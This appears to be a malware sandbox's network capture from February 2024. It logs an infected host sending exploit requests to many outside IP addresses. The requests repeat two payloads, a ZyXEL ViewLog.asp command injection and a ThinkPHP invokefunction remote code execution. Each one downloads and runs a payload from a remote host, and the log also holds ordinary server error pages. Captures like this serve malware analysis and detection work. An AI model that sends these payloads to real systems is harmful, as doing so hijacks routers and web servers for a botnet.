                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/7.0.55 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.55</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.143449485.234.126.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.113725901 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.437608957 CET388INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 16:33:14 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.1448550112.184.55.18180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.121414900 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:16.428843975 CET500INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Server: lighttpd/1.4.54
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.1434350112.133.239.12680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.207340956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.143948285.208.122.938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.280363083 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.524174929 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:03:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.1434494112.162.116.16780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.392982960 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:16.663657904 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:16 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.144777431.136.6.158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.414468050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:17.032972097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.280525923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.872458935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.992229939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:35.975960016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.198998928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:37.157402992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.143463062.45.1.388080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.495625973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.713943005 CET464INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:38:27 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1;mode=block
                                                        Cache-Control: no-store
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
